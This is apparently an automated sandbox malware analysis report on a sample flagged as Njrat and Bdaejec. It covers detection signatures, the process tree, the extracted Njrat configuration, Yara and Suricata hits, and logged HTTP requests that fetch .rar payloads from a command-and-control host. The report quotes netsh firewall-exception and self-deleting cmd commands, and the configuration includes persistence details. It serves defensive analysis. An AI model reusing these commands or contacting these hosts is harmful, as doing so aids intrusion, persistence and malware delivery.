Edit tour

Windows Analysis Report
LisectAVT_2403002B_366.exe

Overview

General Information

Sample name:	LisectAVT_2403002B_366.exe
Analysis ID:	1481747
MD5:	16ab569e9d84f0a2c9aacd47d4998d84
SHA1:	df051511743f94a52bdbc270c4e5bf0d303d6975
SHA256:	7fb6d8e7d8bd58f1445f0c105d609bd3db7445d55d9abefc18e5e78c06b7a96f
Tags:	exeWormRamnit
Infos:

Detection

Bdaejec, Njrat

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Yara detected Bdaejec

Yara detected Njrat

AI detected suspicious sample

Disables zone checking for all users

Drops PE files to the document folder of the user

Drops PE files to the startup folder

Hides threads from debuggers

Infects executable files (exe, dll, sys, html)

Machine Learning detection for dropped file

Machine Learning detection for sample

Modifies the windows firewall

PE file contains section with special chars

PE file has a writeable .text section

PE file has nameless sections

Uses known network protocols on non-standard ports

Uses netsh to modify the Windows network and firewall settings

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to call native functions

Contains functionality to query locales information (e.g. system language)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates a window with clipboard capturing capabilities

Creates files inside the system directory

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Drops PE files to the program root directory (C:\Program Files)

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Entry point lies outside standard sections

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain (date check)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Installs a raw input device (often for capturing keystrokes)

May infect USB drives

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Startup Folder File Write

Stores files to the Windows start menu directory

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses the system / local time for branch decision (may execute only at specific dates)

Yara signature match

Classification

Process Tree

System is w10x64

LisectAVT_2403002B_366.exe (PID: 6620 cmdline: "C:\Users\user\Desktop\LisectAVT_2403002B_366.exe" MD5: 16AB569E9D84F0A2C9AACD47D4998D84)

RRqyIX.exe (PID: 4888 cmdline: C:\Users\user\AppData\Local\Temp\RRqyIX.exe MD5: F7D21DE5C4E81341ECCD280C11DDCC9A)

WerFault.exe (PID: 1756 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4888 -s 1608 MD5: C31336C1EFC2CCB44B4326EA793040F2)

server.exe (PID: 6864 cmdline: "C:\Users\user\AppData\Local\Temp\server.exe" MD5: 16AB569E9D84F0A2C9AACD47D4998D84)

netsh.exe (PID: 6776 cmdline: netsh firewall add allowedprogram "C:\Users\user\AppData\Local\Temp\server.exe" "server.exe" ENABLE MD5: 4E89A1A088BE715D6C946E55AB07C7DF)

conhost.exe (PID: 364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

8d9ba8e0d68a3d306883c186c2013957Windows Update.exe (PID: 3820 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe" MD5: 16AB569E9D84F0A2C9AACD47D4998D84)

8d9ba8e0d68a3d306883c186c2013957Windows Update.exe (PID: 4068 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe" MD5: 16AB569E9D84F0A2C9AACD47D4998D84)

RRqyIX.exe (PID: 1216 cmdline: C:\Users\user\AppData\Local\Temp\RRqyIX.exe MD5: F7D21DE5C4E81341ECCD280C11DDCC9A)

cmd.exe (PID: 364 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\24de2542.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 1372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Microsoft Corporation.exe (PID: 1924 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe" MD5: 16AB569E9D84F0A2C9AACD47D4998D84)

RRqyIX.exe (PID: 64 cmdline: C:\Users\user\AppData\Local\Temp\RRqyIX.exe MD5: F7D21DE5C4E81341ECCD280C11DDCC9A)

cmd.exe (PID: 5324 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\2266597f.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 3496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
NjRAT	RedPacket Security describes NJRat as "a remote access trojan (RAT) has capabilities to log keystrokes, access the victim's camera, steal credentials stored in browsers, open a reverse shell, upload/download files, view the victim's desktop, perform process, file, and registry manipulations, and capabilities to let the attacker update, uninstall, restart, close, disconnect the RAT and rename its campaign ID. Through the Command & Control (CnC) server software, the attacker has capabilities to create and configure the malware to spread through USB drives."It is supposedly popular with actors in the Middle East. Similar to other RATs, many leaked builders may be backdoored.	AQUATIC PANDA Earth Lusca Operation C-Major The Gorgon Group	http://blog.trendmicro.com/trendlabs-security-intelligence/new-rats-emerge-from-leaked-njw0rm-source-code/ http://blogs.360.cn/post/analysis-of-apt-c-37.html http://threatgeek.typepad.com/files/fta-1009---njrat-uncovered-1.pdf https://about.fb.com/news/2021/04/taking-action-against-hackers-in-palestine/ https://asec.ahnlab.com/1369	https://malpedia.caad.fkie.fraunhofer.de/details/win.njrat

Malware Configuration

Threatname: Njrat

{"Campaign ID": "HacKed", "Version": "0.7d", "Install Name": "8d9ba8e0d68a3d306883c186c2013957", "Install Dir": "Adobe Update", "Registry Value": "Software\\Microsoft\\Windows\\CurrentVersion\\Run", "Network Seprator": "|'|'|"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000004.00000002.4628547568.0000000003D51000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
00000000.00000002.2189110013.0000000000602000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
00000000.00000002.2189110013.0000000000602000.00000040.00000001.01000000.00000003.sdmp	Windows_Trojan_Njrat_30f3c220	unknown	unknown	0x113d2:$a1: get_Registry 0x15827:$a2: SEE_MASK_NOZONECHECKS 0x154c9:$a3: Download ERROR 0x15a79:$a4: cmd.exe /c ping 0 -n 2 & del " 0x13a06:$a5: netsh firewall delete allowedprogram "
00000000.00000002.2189110013.0000000000602000.00000040.00000001.01000000.00000003.sdmp	Njrat	detect njRAT in memory	JPCERT/CC Incident Response Group	0x15827:$reg: SEE_MASK_NOZONECHECKS 0x154ad:$msg: Execute ERROR 0x15501:$msg: Execute ERROR 0x15a79:$ping: cmd.exe /c ping 0 -n 2 & del
Process Memory Space: LisectAVT_2403002B_366.exe PID: 6620	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
Process Memory Space: RRqyIX.exe PID: 4888	JoeSecurity_Bdaejec	Yara detected Bdaejec	Joe Security
Process Memory Space: server.exe PID: 6864	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
Process Memory Space: 8d9ba8e0d68a3d306883c186c2013957Windows Update.exe PID: 4068	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
Process Memory Space: RRqyIX.exe PID: 1216	JoeSecurity_Bdaejec	Yara detected Bdaejec	Joe Security
Process Memory Space: Microsoft Corporation.exe PID: 1924	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
Process Memory Space: RRqyIX.exe PID: 64	JoeSecurity_Bdaejec	Yara detected Bdaejec	Joe Security
Click to see the 6 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.LisectAVT_2403002B_366.exe.600000.0.unpack	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
0.2.LisectAVT_2403002B_366.exe.600000.0.unpack	Windows_Trojan_Njrat_30f3c220	unknown	unknown	0x133d2:$a1: get_Registry 0x17827:$a2: SEE_MASK_NOZONECHECKS 0x174c9:$a3: Download ERROR 0x17a79:$a4: cmd.exe /c ping 0 -n 2 & del " 0x15a06:$a5: netsh firewall delete allowedprogram "
0.2.LisectAVT_2403002B_366.exe.600000.0.unpack	Njrat	detect njRAT in memory	JPCERT/CC Incident Response Group	0x17827:$reg: SEE_MASK_NOZONECHECKS 0x174ad:$msg: Execute ERROR 0x17501:$msg: Execute ERROR 0x17a79:$ping: cmd.exe /c ping 0 -n 2 & del
0.2.LisectAVT_2403002B_366.exe.600000.0.unpack	MALWARE_Win_NjRAT	Detects NjRAT / Bladabindi	ditekSHen	0x15a06:$s1: netsh firewall delete allowedprogram 0x15a58:$s2: netsh firewall add allowedprogram 0x17a79:$s3: 63 00 6D 00 64 00 2E 00 65 00 78 00 65 00 20 00 2F 00 63 00 20 00 70 00 69 00 6E 00 67 0x174ad:$s4: Execute ERROR 0x17501:$s4: Execute ERROR 0x174c9:$s5: Download ERROR

Sigma Signatures

System Summary

Sigma detected: Startup Folder File Write

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\server.exe, ProcessId: 6864, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe

Snort Signatures

⊘No Snort rule has matched

Suricata Signatures

ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin - Source IP: 192.168.2.6 - Destination IP: 44.221.84.105

Timestamp:	2024-07-25T13:56:12.378551+0200
SID:	2807908
Source Port:	49723
Destination Port:	799
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin - Source IP: 192.168.2.6 - Destination IP: 44.221.84.105

Timestamp:	2024-07-25T13:55:53.012404+0200
SID:	2807908
Source Port:	49711
Destination Port:	799
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - Possible Malware - Fake Firefox Font Update - Source IP: 192.168.2.6 - Destination IP: 20.42.65.92

Timestamp:	2024-07-25T13:56:00.834389+0200
SID:	2028371
Source Port:	49716
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin - Source IP: 192.168.2.6 - Destination IP: 44.221.84.105

Timestamp:	2024-07-25T13:56:15.343441+0200
SID:	2807908
Source Port:	49726
Destination Port:	799
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin - Source IP: 192.168.2.6 - Destination IP: 44.221.84.105

Timestamp:	2024-07-25T13:56:21.691262+0200
SID:	2807908
Source Port:	49729
Destination Port:	799
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin - Source IP: 192.168.2.6 - Destination IP: 44.221.84.105

Timestamp:	2024-07-25T13:56:26.240091+0200
SID:	2807908
Source Port:	49731
Destination Port:	799
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin - Source IP: 192.168.2.6 - Destination IP: 44.221.84.105

Timestamp:	2024-07-25T13:56:18.589198+0200
SID:	2807908
Source Port:	49728
Destination Port:	799
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup - Source IP: 192.168.2.6 - Destination IP: 1.1.1.1

Timestamp:	2024-07-25T13:55:52.186327+0200
SID:	2838522
Source Port:	64724
Destination Port:	53
Protocol:	UDP
Classtype:	Malware Command and Control Activity Detected

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow - Source IP: 52.165.165.26 - Destination IP: 192.168.2.6

Timestamp:	2024-07-25T13:56:46.196032+0200
SID:	2022930
Source Port:	443
Destination Port:	49738
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin - Source IP: 192.168.2.6 - Destination IP: 44.221.84.105

Timestamp:	2024-07-25T13:55:56.754164+0200
SID:	2807908
Source Port:	49712
Destination Port:	799
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow - Source IP: 52.165.165.26 - Destination IP: 192.168.2.6

Timestamp:	2024-07-25T13:56:08.565178+0200
SID:	2022930
Source Port:	443
Destination Port:	49720
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: LisectAVT_2403002B_366.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://ddos.dnsnb8.net:799/cj//k3.rar	URL Reputation: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k2.rar	URL Reputation: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rar	URL Reputation: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k2.rar86)	Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k2.rarZ	Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k1.rarM	Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k1.rarzO	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rarH	Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k3.rara	Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k1.rar#O	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rar_	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k5.rar	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rarPO	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k4.rar$	Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k1.rar1	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rareM	Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k2.rar5	Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k4.rar	Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k1.rarn	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k2.rarE	Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k2.rarR	Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k1.rard	Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k2.rarp6	Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k3.rarx	Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k1.rarc	Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k2.rarM	Avira URL Cloud: Label: phishing

Antivirus detection for dropped file

Source: C:\Program Files (x86)\Explower.exe	Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Notepad.exe	Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Program Files (x86)\Explower.exe	Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Program Files (x86)\Explower.exe	Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Program Files (x86)\Explower.exe	Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Program Files (x86)\Explower.exe	Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Avira: detection malicious, Label: TR/Dldr.Small.Z.haljq
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Users\user\AppData\Local\Temp\server.exe	Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Program Files (x86)\Explower.exe	Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe	Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Program Files\7-Zip\Uninstall.exe	Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Program Files (x86)\Explower.exe	Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Program Files (x86)\Explower.exe	Avira: detection malicious, Label: W32/Jadtre.B

Found malware configuration

Source: 0.2.LisectAVT_2403002B_366.exe.600000.0.unpack

Malware Configuration Extractor: Njrat {"Campaign ID": "HacKed", "Version": "0.7d", "Install Name": "8d9ba8e0d68a3d306883c186c2013957", "Install Dir": "Adobe Update", "Registry Value": "Software\\Microsoft\\Windows\\CurrentVersion\\Run", "Network Seprator": "|'|'|"}

Yara detected Njrat

Source: Yara match	File source: 0.2.LisectAVT_2403002B_366.exe.600000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.4628547568.0000000003D51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2189110013.0000000000602000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: LisectAVT_2403002B_366.exe PID: 6620, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: server.exe PID: 6864, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 8d9ba8e0d68a3d306883c186c2013957Windows Update.exe PID: 4068, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Microsoft Corporation.exe PID: 1924, type: MEMORYSTR

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Program Files (x86)\Explower.exe	Joe Sandbox ML: detected
Source: C:\Notepad.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Explower.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Explower.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Explower.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Explower.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\server.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Explower.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe	Joe Sandbox ML: detected
Source: C:\Program Files\7-Zip\Uninstall.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Explower.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Explower.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: LisectAVT_2403002B_366.exe

Joe Sandbox ML: detected

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe

Unpacked PE file: 0.2.LisectAVT_2403002B_366.exe.600000.0.unpack

Source: LisectAVT_2403002B_366.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll

Jump to behavior

Source:

Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.1.dr

Spreading

Infects executable files (exe, dll, sys, html)

Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	System file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	System file written: C:\Program Files\7-Zip\Uninstall.exe	Jump to behavior

Source: LisectAVT_2403002B_366.exe	Binary or memory string: [autorun]
Source: LisectAVT_2403002B_366.exe	Binary or memory string: \autorun.inf
Source: LisectAVT_2403002B_366.exe	Binary or memory string: autorun.inf
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.0000000000602000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: \autorun.inf
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.0000000000602000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: [autorun]
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.0000000000602000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: autorun.inf

Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Code function: 1_2_00AE29E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,	1_2_00AE29E2
Source: C:\Users\user\AppData\Local\Temp\server.exe	Code function: 4_2_009E9998 FindFirstFileW,	4_2_009E9998
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Code function: 14_2_009F9998 FindFirstFileW,	14_2_009F9998
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Code function: 15_2_00A329E2 wsprintfA,Sleep,memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,	15_2_00A329E2
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe	Code function: 21_2_00979998 FindFirstFileW,	21_2_00979998
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Code function: 22_2_005129E2 wsprintfA,Sleep,memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,	22_2_005129E2

Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe

Code function: 1_2_00AE2B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,

1_2_00AE2B8C

Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\	Jump to behavior

Networking

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 799

Source: global traffic

TCP traffic: 192.168.2.6:49711 -> 44.221.84.105:799

Source: Joe Sandbox View

IP Address: 44.221.84.105 44.221.84.105

Source: global traffic	HTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cj//k3.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cj//k4.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cj//k5.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe

Code function: 1_2_00AE1099 wsprintfA,WinExec,lstrlen,wsprintfA,wsprintfA,URLDownloadToFileA,lstrlen,Sleep,

1_2_00AE1099

Source: global traffic	HTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
